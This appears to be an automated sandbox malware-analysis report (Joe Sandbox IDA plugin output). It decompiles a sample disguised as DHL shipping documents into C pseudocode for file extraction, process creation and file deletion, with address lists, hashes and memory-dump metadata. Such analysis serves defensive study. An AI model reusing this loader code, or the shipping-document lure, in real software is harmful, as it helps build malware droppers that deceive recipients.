                        												__edx = 0;
                        												_t414 = __eax %  *(__ebp - 0x74);
                        												__eax = __eax /  *(__ebp - 0x74);
                        												__edx = _t414;
                        												__eax =  *(__ebp - 0x68);
                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                        												__eflags =  *(__ebp - 0x30);
                        												 *( *(__ebp - 0x68)) = __cl;
                        												 *(__ebp - 0x14) = _t414;
                        												if( *(__ebp - 0x30) > 0) {
                        													continue;
                        												} else {
                        													L80:
                        													 *(__ebp - 0x88) = 2;
                        													goto L1;
                        												}
                        											}
                        											 *(__ebp - 0x88) = 0x1c;
                        											goto L170;
                        									}
                        								}
                        								L171:
                        								_t535 = _t534 | 0xffffffff;
                        								goto L172;
                        							}
                        						}
                        					}
                        				}
                        			}













                        0x00406cc8
                        0x00000000
                        0x00000000
                        0x00406cca
                        0x00406cd0
                        0x00406cfa
                        0x00406d00
                        0x00406d07
                        0x00000000
                        0x00406d07
                        0x00406cd6
                        0x00406cd9
                        0x00406cde
                        0x00406cde
                        0x00406ce9
                        0x00406cf1
                        0x00406cf4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406d39
                        0x00406d3f
                        0x00406d42
                        0x00406d4f
                        0x00406d57
                        0x004073cb
                        0x00000000
                        0x00000000
                        0x00406d0e
                        0x00406d0e
                        0x00406d12
                        0x0040755d
                        0x00000000
                        0x0040755d
                        0x00406d1e
                        0x00406d29
                        0x00406d29
                        0x00406d29
                        0x00406d2c
                        0x00406d2f
                        0x00406d32
                        0x00406d37
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004073ce
                        0x004073ce
                        0x004073d4
                        0x004073da
                        0x004073e0
                        0x004073fa
                        0x004073fd
                        0x00407403
                        0x0040740e
                        0x00407410
                        0x004073e2
                        0x004073e2
                        0x004073f1
                        0x004073f5
                        0x004073f5
                        0x0040741a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406d5f
                        0x00406d61
                        0x00406d64
                        0x00406dd5
                        0x00406dd8
                        0x00406ddb
                        0x00406de2
                        0x00406dec
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x004073cb
                        0x00406d66
                        0x00406d6a
                        0x00406d6d
                        0x00406d6f
                        0x00406d72
                        0x00406d75
                        0x00406d77
                        0x00406d7a
                        0x00406d7c
                        0x00406d81
                        0x00406d84
                        0x00406d87
                        0x00406d8b
                        0x00406d92
                        0x00406d95
                        0x00406d9c
                        0x00406da0
                        0x00406da8
                        0x00406da8
                        0x00406da8
                        0x00406da2
                        0x00406da2
                        0x00406da2
                        0x00406d97
                        0x00406d97
                        0x00406d97
                        0x00406dac
                        0x00406daf
                        0x00406dcd
                        0x00406dcf
                        0x00000000
                        0x00406db1
                        0x00406db1
                        0x00406db4
                        0x00406db7
                        0x00406dba
                        0x00406dbc
                        0x00406dbc
                        0x00406dbc
                        0x00406dbf
                        0x00406dc2
                        0x00406dc4
                        0x00406dc5
                        0x00406dc8
                        0x00000000
                        0x00406dc8
                        0x00000000
                        0x00406ffe
                        0x00407002
                        0x00407020
                        0x00407023
                        0x0040702a
                        0x0040702d
                        0x00407030
                        0x00407033
                        0x00407036
                        0x00407039
                        0x0040703b
                        0x00407042
                        0x00407043
                        0x00407045
                        0x00407048
                        0x0040704b
                        0x0040704e
                        0x0040704e
                        0x00407053
                        0x00000000
                        0x00407053
                        0x00407004
                        0x00407007
                        0x0040700a
                        0x00407014
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004070ab
                        0x004070af
                        0x00000000
                        0x00000000
                        0x004070b5
                        0x004070b9
                        0x00000000
                        0x00000000
                        0x004070bf
                        0x004070c1
                        0x004070c5
                        0x004070c5
                        0x004070c8
                        0x004070cc
                        0x00000000
                        0x00000000
                        0x0040711c
                        0x00407120
                        0x00407127
                        0x0040712a
                        0x0040712d
                        0x00407137
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x004073cb
                        0x00407122
                        0x00000000
                        0x00000000
                        0x00407143
                        0x00407147
                        0x0040714e
                        0x00407151
                        0x00407154
                        0x00407149
                        0x00407149
                        0x00407149
                        0x00407157
                        0x0040715a
                        0x0040715d
                        0x0040715d
                        0x00407160
                        0x00407163
                        0x00407166
                        0x00407166
                        0x00407169
                        0x00407170
                        0x00407175
                        0x00000000
                        0x00000000
                        0x00407203
                        0x00407203
                        0x00407207
                        0x004075a5
                        0x00000000
                        0x004075a5
                        0x0040720d
                        0x00407210
                        0x00407213
                        0x00407217
                        0x0040721a
                        0x00407220
                        0x00407222
                        0x00407222
                        0x00407222
                        0x00407225
                        0x00407228
                        0x00000000
                        0x00000000
                        0x00406df8
                        0x00406df8
                        0x00406dfc
                        0x00407569
                        0x00000000
                        0x00407569
                        0x00406e02
                        0x00406e05
                        0x00406e08
                        0x00406e0c
                        0x00406e0f
                        0x00406e15
                        0x00406e17
                        0x00406e17
                        0x00406e17
                        0x00406e1a
                        0x00406e1d
                        0x00406e1d
                        0x00406e20
                        0x00406e23
                        0x00000000
                        0x00000000
                        0x00406e29
                        0x00406e2f
                        0x00000000
                        0x00000000
                        0x00406e35
                        0x00406e35
                        0x00406e39
                        0x00406e3c
                        0x00406e3f
                        0x00406e42
                        0x00406e45
                        0x00406e46
                        0x00406e49
                        0x00406e4b
                        0x00406e51
                        0x00406e54
                        0x00406e57
                        0x00406e5a
                        0x00406e5d
                        0x00406e60
                        0x00406e63
                        0x00406e7f
                        0x00406e82
                        0x00406e85
                        0x00406e88
                        0x00406e8f
                        0x00406e93
                        0x00406e95
                        0x00406e99
                        0x00406e65
                        0x00406e65
                        0x00406e69
                        0x00406e71
                        0x00406e76
                        0x00406e78
                        0x00406e7a
                        0x00406e7a
                        0x00406e9c
                        0x00406ea3
                        0x00406ea6
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eb1
                        0x00406eb1
                        0x00406eb5
                        0x00407575
                        0x00000000
                        0x00407575
                        0x00406ebb
                        0x00406ebe
                        0x00406ec1
                        0x00406ec5
                        0x00406ec8
                        0x00406ece
                        0x00406ed0
                        0x00406ed0
                        0x00406ed0
                        0x00406ed3
                        0x00406ed6
                        0x00406ed6
                        0x00406ed6
                        0x00406edc
                        0x00000000
                        0x00000000
                        0x00406ede
                        0x00406ee1
                        0x00406ee4
                        0x00406ee7
                        0x00406eea
                        0x00406eed
                        0x00406ef0
                        0x00406ef3
                        0x00406ef6
                        0x00406ef9
                        0x00406efc
                        0x00406f14
                        0x00406f17
                        0x00406f1a
                        0x00406f1d
                        0x00406f1d
                        0x00406f20
                        0x00406f24
                        0x00406f26
                        0x00406efe
                        0x00406efe
                        0x00406f06
                        0x00406f0b
                        0x00406f0d
                        0x00406f0f
                        0x00406f0f
                        0x00406f29
                        0x00406f30
                        0x00406f33
                        0x00000000
                        0x00406f35
                        0x00000000
                        0x00406f35
                        0x00406f33
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00000000
                        0x00000000
                        0x00406f75
                        0x00406f75
                        0x00406f79
                        0x00407581
                        0x00000000
                        0x00407581
                        0x00406f7f
                        0x00406f82
                        0x00406f85
                        0x00406f89
                        0x00406f8c
                        0x00406f92
                        0x00406f94
                        0x00406f94
                        0x00406f94
                        0x00406f97
                        0x00406f9a
                        0x00406f9a
                        0x00406fa0
                        0x00406f3e
                        0x00406f3e
                        0x00406f41
                        0x00000000
                        0x00406f41
                        0x00406fa2
                        0x00406fa2
                        0x00406fa5
                        0x00406fa8
                        0x00406fab
                        0x00406fae
                        0x00406fb1
                        0x00406fb4
                        0x00406fb7
                        0x00406fba
                        0x00406fbd
                        0x00406fc0
                        0x00406fd8
                        0x00406fdb
                        0x00406fde
                        0x00406fe1
                        0x00406fe1
                        0x00406fe4
                        0x00406fe8
                        0x00406fea
                        0x00406fc2
                        0x00406fc2
                        0x00406fca
                        0x00406fcf
                        0x00406fd1
                        0x00406fd3
                        0x00406fd3
                        0x00406fed
                        0x00406ff4
                        0x00406ff7
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00407286
                        0x00407286
                        0x0040728a
                        0x004075b1
                        0x00000000
                        0x004075b1
                        0x00407290
                        0x00407293
                        0x00407296
                        0x0040729a
                        0x0040729d
                        0x004072a3
                        0x004072a5
                        0x004072a5
                        0x004072a5
                        0x004072a8
                        0x00000000
                        0x00000000
                        0x00407056
                        0x00407056
                        0x00407059
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x00000000
                        0x00407395
                        0x00407399
                        0x004073bb
                        0x004073be
                        0x004073c8
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x004073cb
                        0x0040739b
                        0x0040739e
                        0x004073a2
                        0x004073a5
                        0x004073a5
                        0x004073a8
                        0x00000000
                        0x00000000
                        0x00407452
                        0x00407456
                        0x00407474
                        0x00407474
                        0x00407474
                        0x0040747b
                        0x00407482
                        0x00407489
                        0x00407489
                        0x00000000
                        0x00407489
                        0x00407458
                        0x0040745b
                        0x0040745e
                        0x00407461
                        0x00407468
                        0x004073ac
                        0x004073ac
                        0x004073af
                        0x00000000
                        0x00000000
                        0x00407543
                        0x00407546
                        0x00407447
                        0x00000000
                        0x00000000
                        0x0040717d
                        0x0040717f
                        0x00407186
                        0x00407187
                        0x00407189
                        0x0040718c
                        0x00000000
                        0x00000000
                        0x00407194
                        0x00407197
                        0x0040719a
                        0x0040719c
                        0x0040719e
                        0x0040719e
                        0x0040719f
                        0x004071a2
                        0x004071a9
                        0x004071ac
                        0x004071ba
                        0x00000000
                        0x00000000
                        0x00407490
                        0x00407490
                        0x00407493
                        0x0040749a
                        0x00000000
                        0x00000000
                        0x0040749f
                        0x0040749f
                        0x004074a3
                        0x004075db
                        0x00000000
                        0x004075db
                        0x004074a9
                        0x004074ac
                        0x004074af
                        0x004074b3
                        0x004074b6
                        0x004074bc
                        0x004074be
                        0x004074be
                        0x004074be
                        0x004074c1
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c7
                        0x004074c7
                        0x004074cb
                        0x0040752b
                        0x0040752e
                        0x00407533
                        0x00407534
                        0x00407536
                        0x00407538
                        0x0040753b
                        0x00407447
                        0x00407447
                        0x00000000
                        0x0040744d
                        0x00407447
                        0x004074cd
                        0x004074d3
                        0x004074d6
                        0x004074d9
                        0x004074dc
                        0x004074df
                        0x004074e2
                        0x004074e5
                        0x004074e8
                        0x004074eb
                        0x004074ee
                        0x00407507
                        0x0040750a
                        0x0040750d
                        0x00407510
                        0x00407514
                        0x00407516
                        0x00407516
                        0x00407517
                        0x0040751a
                        0x004074f0
                        0x004074f0
                        0x004074f8
                        0x004074fd
                        0x004074ff
                        0x00407502
                        0x00407502
                        0x0040751d
                        0x00407524
                        0x00000000
                        0x00407526
                        0x00000000
                        0x00407526
                        0x00000000
                        0x004071c2
                        0x004071c5
                        0x004071fb
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732e
                        0x0040732e
                        0x00407331
                        0x00407333
                        0x004075bd
                        0x00000000
                        0x004075bd
                        0x00407339
                        0x0040733c
                        0x00000000
                        0x00000000
                        0x00407342
                        0x00407346
                        0x00407349
                        0x00407349
                        0x00407349
                        0x00000000
                        0x00407349
                        0x004071c7
                        0x004071c9
                        0x004071cb
                        0x004071cd
                        0x004071d0
                        0x004071d1
                        0x004071d3
                        0x004071d5
                        0x004071d8
                        0x004071db
                        0x004071f1
                        0x004071f6
                        0x0040722e
                        0x0040722e
                        0x00407232
                        0x0040725e
                        0x00407260
                        0x00407267
                        0x0040726a
                        0x0040726d
                        0x0040726d
                        0x00407272
                        0x00407272
                        0x00407274
                        0x00407277
                        0x0040727e
                        0x00407281
                        0x004072ae
                        0x004072ae
                        0x004072b1
                        0x004072b4
                        0x00407328
                        0x00407328
                        0x00407328
                        0x00000000
                        0x00407328
                        0x004072b6
                        0x004072bc
                        0x004072bf
                        0x004072c2
                        0x004072c5
                        0x004072c8
                        0x004072cb
                        0x004072ce
                        0x004072d1
                        0x004072d4
                        0x004072d7
                        0x004072f0
                        0x004072f2
                        0x004072f5
                        0x004072f6
                        0x004072f9
                        0x004072fb
                        0x004072fe
                        0x00407300
                        0x00407302
                        0x00407305
                        0x00407307
                        0x0040730a
                        0x0040730e
                        0x00407310
                        0x00407310
                        0x00407311
                        0x00407314
                        0x00407317
                        0x004072d9
                        0x004072d9
                        0x004072e1
                        0x004072e6
                        0x004072e8
                        0x004072eb
                        0x004072eb
                        0x0040731a
                        0x00407321
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x00000000
                        0x00407323
                        0x00000000
                        0x00407323
                        0x00407321
                        0x00407234
                        0x00407237
                        0x00407239
                        0x0040723c
                        0x0040723f
                        0x00407242
                        0x00407244
                        0x00407247
                        0x0040724a
                        0x0040724a
                        0x0040724d
                        0x0040724d
                        0x00407250
                        0x00407257
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x00000000
                        0x00407259
                        0x00000000
                        0x00407259
                        0x00407257
                        0x004071dd
                        0x004071e0
                        0x004071e2
                        0x004071e5
                        0x00000000
                        0x00000000
                        0x00406f44
                        0x00406f44
                        0x00406f48
                        0x0040758d
                        0x00000000
                        0x0040758d
                        0x00406f4e
                        0x00406f51
                        0x00406f54
                        0x00406f57
                        0x00406f5a
                        0x00406f5d
                        0x00406f60
                        0x00406f62
                        0x00406f65
                        0x00406f68
                        0x00406f6b
                        0x00406f6d
                        0x00406f6d
                        0x00406f6d
                        0x00000000
                        0x00000000
                        0x004070cf
                        0x004070cf
                        0x004070d3
                        0x00407599
                        0x00000000
                        0x00407599
                        0x004070d9
                        0x004070dc
                        0x004070df
                        0x004070e2
                        0x004070e4
                        0x004070e4
                        0x004070e4
                        0x004070e7
                        0x004070ea
                        0x004070ed
                        0x004070f0
                        0x004070f3
                        0x004070f6
                        0x004070f7
                        0x004070f9
                        0x004070f9
                        0x004070f9
                        0x004070fc
                        0x004070ff
                        0x00407102
                        0x00407105
                        0x00407105
                        0x00407105
                        0x00407108
                        0x0040710a
                        0x0040710a
                        0x00000000
                        0x00000000
                        0x0040734c
                        0x0040734c
                        0x0040734c
                        0x00407350
                        0x00000000
                        0x00000000
                        0x00407356
                        0x00407359
                        0x0040735c
                        0x0040735f
                        0x00407361
                        0x00407361
                        0x00407361
                        0x00407364
                        0x00407367
                        0x0040736a
                        0x0040736d
                        0x00407370
                        0x00407373
                        0x00407374
                        0x00407376
                        0x00407376
                        0x00407376
                        0x00407379
                        0x0040737c
                        0x0040737f
                        0x00407382
                        0x00407385
                        0x00407389
                        0x0040738b
                        0x0040738e
                        0x00000000
                        0x00407390
                        0x0040710d
                        0x0040710d
                        0x00000000
                        0x0040710d
                        0x0040738e
                        0x004075c3
                        0x00000000
                        0x00000000
                        0x00406bf2
                        0x004075fa
                        0x004075fa
                        0x00000000
                        0x004075fa
                        0x00407447
                        0x004073ce
                        0x004073cb

                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                        • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                        • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                        • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 41%
                        			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
                        				int _t9;
                        				long _t13;
                        				WCHAR* _t14;
                        
                        				_t14 = _a4;
                        				_t13 = E00406133(_t14);
                        				if(_t13 == 0xffffffff) {
                        					L8:
                        					return 0;
                        				}
                        				_push(_t14);
                        				if((_a8 & 0x00000001) == 0) {
                        					_t9 = DeleteFileW();
                        				} else {
                        					_t9 = RemoveDirectoryW(); // executed
                        				}
                        				if(_t9 == 0) {
                        					if((_a8 & 0x00000004) == 0) {
                        						SetFileAttributesW(_t14, _t13);
                        					}
                        					goto L8;
                        				} else {
                        					return 1;
                        				}
                        			}







                        APIs
                          • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                          • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                        • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                        • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                        Similarity
                        • API ID: File$Attributes$DeleteDirectoryRemove
                        • String ID:
                        • API String ID: 1655745494-0
                        • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                        • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                        • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                        • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00406AE0(void* __ecx, void* _a4) {
                        				long _v8;
                        				long _t6;
                        
                        				_t6 = WaitForSingleObject(_a4, 0x64);
                        				while(_t6 == 0x102) {
                        					E00406A71(0xf);
                        					_t6 = WaitForSingleObject(_a4, 0x64);
                        				}
                        				GetExitCodeProcess(_a4,  &_v8); // executed
                        				return _v8;
                        			}






                        APIs
                        • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                        • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                        • GetExitCodeProcess.KERNELBASE ref: 00406B13
                        Similarity
                        • API ID: ObjectSingleWait$CodeExitProcess
                        • String ID:
                        • API String ID: 2567322000-0
                        • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                        • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                        • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                        • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040620A(void* _a4, void* _a8, long _a12) {
                        				int _t7;
                        				long _t11;
                        
                        				_t11 = _a12;
                        				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                        				if(_t7 == 0 || _t11 != _a12) {
                        					return 0;
                        				} else {
                        					return 1;
                        				}
                        			}






                        APIs
                        • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040FACF,codeIncrementalHandleCreate,00403579,codeIncrementalHandleCreate,0040FACF,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                        Strings
                        • codeIncrementalHandleCreate, xrefs: 0040620A
                        Similarity
                        • API ID: FileWrite
                        • String ID: codeIncrementalHandleCreate
                        • API String ID: 3934441357-1664959861
                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                        • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                        • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004061DB(void* _a4, void* _a8, long _a12) {
                        				int _t7;
                        				long _t11;
                        
                        				_t11 = _a12;
                        				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                        				if(_t7 == 0 || _t11 != _a12) {
                        					return 0;
                        				} else {
                        					return 1;
                        				}
                        			}






                        APIs
                        • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,codeIncrementalHandleCreate,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                        Strings
                        • codeIncrementalHandleCreate, xrefs: 004061DB
                        Similarity
                        • API ID: FileRead
                        • String ID: codeIncrementalHandleCreate
                        • API String ID: 2738559852-1664959861
                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                        • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                        • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E00403371(void* __ecx, long _a4, void* _a8, void* _a12, long _a16) {
                        				long _v8;
                        				long _t21;
                        				long _t22;
                        				void* _t24;
                        				long _t26;
                        				int _t27;
                        				long _t28;
                        				void* _t29;
                        				void* _t30;
                        				long _t31;
                        				long _t32;
                        				long _t36;
                        
                        				_t21 = _a4;
                        				if(_t21 >= 0) {
                        					_t32 = _t21 +  *0x42a2b8;
                        					 *0x420ef4 = _t32;
                        					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                        				}
                        				_t22 = E00403479(4);
                        				if(_t22 >= 0) {
                        					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                        					if(_t24 == 0) {
                        						L18:
                        						_push(0xfffffffd);
                        						goto L19;
                        					} else {
                        						 *0x420ef4 =  *0x420ef4 + 4;
                        						_t36 = E00403479(_a4);
                        						if(_t36 < 0) {
                        							L21:
                        							_t22 = _t36;
                        						} else {
                        							if(_a12 != 0) {
                        								_t26 = _a4;
                        								if(_t26 >= _a16) {
                        									_t26 = _a16;
                        								}
                        								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                        								if(_t27 != 0) {
                        									_t36 = _v8;
                        									 *0x420ef4 =  *0x420ef4 + _t36;
                        									goto L21;
                        								} else {
                        									goto L18;
                        								}
                        							} else {
                        								if(_a4 <= 0) {
                        									goto L21;
                        								} else {
                        									while(1) {
                        										_t28 = _a4;
                        										if(_a4 >= 0x4000) {
                        											_t28 = 0x4000;
                        										}
                        										_v8 = _t28;
                        										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
                        										if(_t29 == 0) {
                        											goto L18;
                        										}
                        										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                        										if(_t30 == 0) {
                        											_push(0xfffffffe);
                        											L19:
                        											_pop(_t22);
                        										} else {
                        											_t31 = _v8;
                        											_a4 = _a4 - _t31;
                        											 *0x420ef4 =  *0x420ef4 + _t31;
                        											_t36 = _t36 + _t31;
                        											if(_a4 > 0) {
                        												continue;
                        											} else {
                        												goto L21;
                        											}
                        										}
                        										goto L22;
                        									}
                        									goto L18;
                        								}
                        							}
                        						}
                        					}
                        				}
                        				L22:
                        				return _t22;
                        			}
















                        APIs
                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                        • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                        • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                        • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E00401389(signed int _a4) {
                        				intOrPtr* _t6;
                        				void* _t8;
                        				void* _t10;
                        				signed int _t11;
                        				void* _t12;
                        				signed int _t16;
                        				signed int _t17;
                        				void* _t18;
                        
                        				_t17 = _a4;
                        				while(_t17 >= 0) {
                        					_t6 = _t17 * 0x1c +  *0x42a290;
                        					if( *_t6 == 1) {
                        						break;
                        					}
                        					_push(_t6); // executed
                        					_t8 = E00401434(); // executed
                        					if(_t8 == 0x7fffffff) {
                        						return 0x7fffffff;
                        					}
                        					_t10 = E0040136D(_t8);
                        					if(_t10 != 0) {
                        						_t11 = _t10 - 1;
                        						_t16 = _t17;
                        						_t17 = _t11;
                        						_t12 = _t11 - _t16;
                        					} else {
                        						_t12 = _t10 + 1;
                        						_t17 = _t17 + 1;
                        					}
                        					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                        						 *0x42924c =  *0x42924c + _t12;
                        						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
                        					}
                        				}
                        				return 0;
                        			}












                        APIs
                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                        • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                        • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                        • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                        • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00405C4B(WCHAR* _a4) {
                        				struct _PROCESS_INFORMATION _v20;
                        				int _t7;
                        
                        				0x426750->cb = 0x44;
                        				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                        				if(_t7 != 0) {
                        					CloseHandle(_v20.hThread);
                        					return _v20.hProcess;
                        				}
                        				return _t7;
                        			}






                        APIs
                        Similarity
                        • API ID: CloseCreateHandleProcess
                        • String ID:
                        • API String ID: 3712363035-0
                        • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                        • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                        • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                        • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00406A35(signed int _a4) {
                        				struct HINSTANCE__* _t5;
                        				signed int _t10;
                        
                        				_t10 = _a4 << 3;
                        				_t8 =  *(_t10 + 0x40a410);
                        				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                        				if(_t5 != 0) {
                        					L2:
                        					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                        				}
                        				_t5 = E004069C5(_t8); // executed
                        				if(_t5 == 0) {
                        					return 0;
                        				}
                        				goto L2;
                        			}






                        APIs
                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                          • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                          • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                          • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
